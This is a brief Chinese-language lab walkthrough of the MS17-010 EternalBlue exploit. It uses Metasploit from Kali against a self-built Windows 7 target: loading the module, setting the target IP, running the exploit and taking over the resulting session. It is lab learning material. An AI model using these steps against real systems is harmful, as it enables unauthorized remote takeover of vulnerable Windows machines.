實驗環境:一台win7靶機,kali作為攻擊機
控制台下輸入msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
接下來可以看一下受這個漏洞影響的操作系統
可以看出受影響的有兩個,分別是win7和server 2008 R2兩種操作系統(ps:這兩款靶機都可以自己搭建一下,我這里使用的是win7)
show options 看一下需要設置的參數
可以看出我們需要設置RHOST 和RPORT 已經下面兩個required為 yes的參數
這里只需設定一下靶機的IP地址即可,其余的參數默認就好
exploit 進行攻擊(-z是為了在成功攻擊目標后暫時不使用控制會話進行交互),也可以直接exploit,直接返回靶機的控制台,簡單的按CTRL -Z命令將控制會話直接放到后台運行,我這里是為了更好地看一下sessions
sessions -l 查看所有的會話
sessions -i ID 啟用ID會話
接下來就直接進入到win7的控制台
然后就可以進行下一步的各種操作了